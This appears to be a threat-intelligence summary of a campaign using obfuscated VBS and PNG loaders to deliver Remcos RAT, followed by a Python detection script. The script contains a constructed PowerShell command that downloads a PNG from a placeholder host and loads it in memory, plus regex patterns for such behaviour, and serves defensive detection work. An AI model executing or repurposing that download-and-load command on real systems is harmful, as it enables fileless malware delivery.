Multi-Stage Malware Campaign Utilizing Obfuscated VBS and PNG Loaders

Severity: High (Score: 72.6)

Sources: Cybersecuritynews, Socprime, Gbhackers

Summary

A sophisticated multi-stage malware campaign has been identified that uses Unicode-obfuscated Visual Basic Script (VBS) loaders and PNG files to execute malicious payloads. The campaign employs a fileless PowerShell loader and can deliver various payloads, including Remcos RAT and UAC-bypass DLLs. The threat actor hosts the malware toolkit in openly accessible directories under a .xyz domain and on Cloudflare-backed subdomains, which allows payloads to be swapped rapidly. Initial detection occurred through LevelBlue’s MDR SOC, which quarantined the VBS artifact and uncovered a Base64-encoded PowerShell command that downloaded PNG files containing embedded .NET assemblies. The campaign operates without leaving traces on disk, posing a significant risk to organizations. Recommended defenses include restricting execution of high-risk script types and monitoring for suspicious in-memory .NET loading. The campaign is currently assessed as active, so immediate defensive measures are warranted.

Key Points:

  • The campaign uses obfuscated VBS and PNG files to deliver malicious payloads.
  • LevelBlue’s MDR SOC detected the initial malware, revealing a sophisticated infrastructure.
  • Defenders are advised to restrict execution of high-risk scripts and monitor for in-memory threats.
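As an added detection example (not code from the original report or from LevelBlue), the Python below decodes the UTF-16LE Base64 payload of a PowerShell -EncodedCommand from constructed process-creation records and flags the chain the summary describes: a script host (the VBS loader) spawning PowerShell, which downloads PNG content and loads a .NET assembly in memory. The sample records, the placeholder domain and the indicator names are assumptions.

```python
import base64
import re

# Constructed sample process-creation records, not real telemetry. Record 0 mimics the
# described chain (wscript.exe -> encoded PowerShell); record 1 is benign admin noise.
SAMPLE_EVENTS = [
    {"parent": "wscript.exe", "image": "powershell.exe",
     "cmdline": "powershell.exe -NoP -W Hidden -EncodedCommand " + base64.b64encode(
         "$b=(New-Object Net.WebClient).DownloadData('https://placeholder.invalid/stage.png');"
         "[Reflection.Assembly]::Load($b)".encode("utf-16-le")).decode()},
    {"parent": "explorer.exe", "image": "powershell.exe",
     "cmdline": "powershell.exe -File C:\\scripts\\backup.ps1"},
]

# PowerShell accepts abbreviated forms of -EncodedCommand; the payload is Base64 of UTF-16LE text.
ENCODED_FLAG = re.compile(r"-(?:encodedcommand|enc|ec|e)\s+([A-Za-z0-9+/=]+)", re.IGNORECASE)
SCRIPT_HOSTS = {"wscript.exe", "cscript.exe"}
INDICATORS = {
    # Downloading a .png via WebClient, as in the campaign's PNG-wrapped .NET assemblies.
    "png_download": re.compile(r"Download(?:Data|String|File)\([^)]*\.png", re.IGNORECASE),
    # Reflective in-memory .NET load: no file touches disk.
    "reflective_load": re.compile(r"\[(?:System\.)?Reflection\.Assembly\]::Load", re.IGNORECASE),
}

def decode_encoded_command(cmdline):
    """Return the decoded -EncodedCommand text, or None if absent or undecodable."""
    m = ENCODED_FLAG.search(cmdline)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1)).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None

def analyze_event(event):
    """Return the indicator names triggered by one process-creation record."""
    hits = []
    if event["parent"].lower() in SCRIPT_HOSTS and event["image"].lower() == "powershell.exe":
        hits.append("script_host_spawned_powershell")
    decoded = decode_encoded_command(event["cmdline"])
    if decoded is not None:
        hits.append("encoded_command")
        hits.extend(name for name, pat in INDICATORS.items() if pat.search(decoded))
    return hits

def triage(events):
    """Map event index -> hits, keeping only records that triggered at least one indicator."""
    results = {i: analyze_event(e) for i, e in enumerate(events)}
    return {i: h for i, h in results.items() if h}
```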

Key Entities

  • Malware (attack_type)
  • Open Directory Malware Campaign (campaign)
  • Remcos RAT (malware)
  • T1053 - Scheduled Task/Job (mitre_attack)
  • T1059.001 - PowerShell (mitre_attack)
  • T1059.005 - Visual Basic (mitre_attack)
  • T1105 - Ingress Tool Transfer (mitre_attack)
  • Windows (platform)
  • PowerShell (tool)
  • Python (tool)